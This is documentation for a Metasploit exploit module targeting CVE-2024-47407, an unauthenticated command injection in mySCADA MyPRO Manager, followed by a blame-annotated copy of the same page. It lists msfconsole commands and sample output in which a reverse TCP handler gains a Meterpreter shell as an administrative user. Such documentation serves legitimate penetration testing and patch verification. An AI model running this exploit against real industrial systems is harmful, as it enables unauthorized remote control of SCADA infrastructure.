documentation/modules/exploit/windows/scada/mypro_mgr_cmd.md

## Vulnerable Application

**Vulnerability Description**

This module exploits a command injection vulnerability in mySCADA MyPRO Manager <= v1.2 (CVE-2024-47407).

An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary OS commands, which will get executed in the context of
`myscada9`, an administrative user that is automatically added by the product during installation.

Versions <= 1.2 are affected. CISA published [ICSA-24-326-07](https://www.cisa.gov/news-events/ics-advisories/icsa-24-326-07) to cover
the security issues. The official changelog from the vendor for the updated version is available
[here](https://www.myscada.org/docs/5-11-2024/).

**Vulnerable Application Installation**

A trial version of the software can be obtained from [the vendor](https://www.myscada.org/mypro/).

**Successfully tested on**

- mySCADA MyPRO Manager 1.2 on Windows 11 (10.0 Build 22621)

## Verification Steps

1. Install the application
2. After installation, reboot the system and wait some time until a runtime (e.g., 9.2.1) has been fetched and installed.
3. Start `msfconsole` and run the following commands:

```
msf > use exploit/windows/scada/mypro_mgr_cmd 
msf exploit(windows/scada/mypro_mgr_cmd) > set RHOSTS <IP>
msf exploit(windows/scada/mypro_mgr_cmd) > exploit 
```

You should get a meterpreter session in the context of `myscada9`.

## Scenarios

Running the exploit against MyPRO Manager v1.2 on Windows 11, using curl as a fetch command, should result in an output similar to the
following:

```
msf exploit(windows/scada/mypro_mgr_cmd) > exploit 

[*] Started reverse TCP handler on 192.168.1.227:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Sending stage (201798 bytes) to 192.168.1.228
[*] Meterpreter session 1 opened (192.168.1.227:4444 -> 192.168.1.228:50472) at 2025-01-29 12:38:39 -0500
[*] Exploit finished, check thy shell.

meterpreter > getuid 
Server username: asdf\myscada9
meterpreter > sysinfo 
Computer        : asdf
OS              : Windows 11 (10.0 Build 22621).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
```
CVE-2024-47407 2024-11-13 03:55:17 +00:00			`## Vulnerable Application`

			`Vulnerability Description`

			`This module exploits a command injection vulnerability in mySCADA MyPRO Manager <= v1.2 (CVE-2024-47407).`

			`An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary OS commands, which will get executed in the context of`
			`myscada9`, an administrative user that is automatically added by the product during installation.

			`Versions <= 1.2 are affected. CISA published [ICSA-24-326-07](https://www.cisa.gov/news-events/ics-advisories/icsa-24-326-07) to cover`
			`the security issues. The official changelog from the vendor for the updated version is available`
			`[here](https://www.myscada.org/docs/5-11-2024/).`

			`Vulnerable Application Installation`

			`A trial version of the software can be obtained from [the vendor](https://www.myscada.org/mypro/).`

			`Successfully tested on`

			`- mySCADA MyPRO Manager 1.2 on Windows 11 (10.0 Build 22621)`

			`## Verification Steps`

			`1. Install the application`
			`2. After installation, reboot the system and wait some time until a runtime (e.g., 9.2.1) has been fetched and installed.`
			3. Start `msfconsole` and run the following commands:

			```
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf > use exploit/windows/scada/mypro_mgr_cmd`
			`msf exploit(windows/scada/mypro_mgr_cmd) > set RHOSTS <IP>`
			`msf exploit(windows/scada/mypro_mgr_cmd) > exploit`
CVE-2024-47407 2024-11-13 03:55:17 +00:00			```

			You should get a meterpreter session in the context of `myscada9`.

			`## Scenarios`

			`Running the exploit against MyPRO Manager v1.2 on Windows 11, using curl as a fetch command, should result in an output similar to the`
			`following:`

			```
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(windows/scada/mypro_mgr_cmd) > exploit`
CVE-2024-47407 2024-11-13 03:55:17 +00:00
			`[*] Started reverse TCP handler on 192.168.1.227:4444`
			`[*] Running automatic check ("set AutoCheck false" to disable)`
			`[+] The target appears to be vulnerable.`
			`[*] Sending stage (201798 bytes) to 192.168.1.228`
			`[*] Meterpreter session 1 opened (192.168.1.227:4444 -> 192.168.1.228:50472) at 2025-01-29 12:38:39 -0500`
			`[*] Exploit finished, check thy shell.`

			`meterpreter > getuid`
			`Server username: asdf\myscada9`
			`meterpreter > sysinfo`
			`Computer : asdf`
			`OS : Windows 11 (10.0 Build 22621).`
			`Architecture : x64`
			`System Language : en_US`
			`Domain : WORKGROUP`
			`Logged On Users : 3`
			`Meterpreter : x64/windows`
			```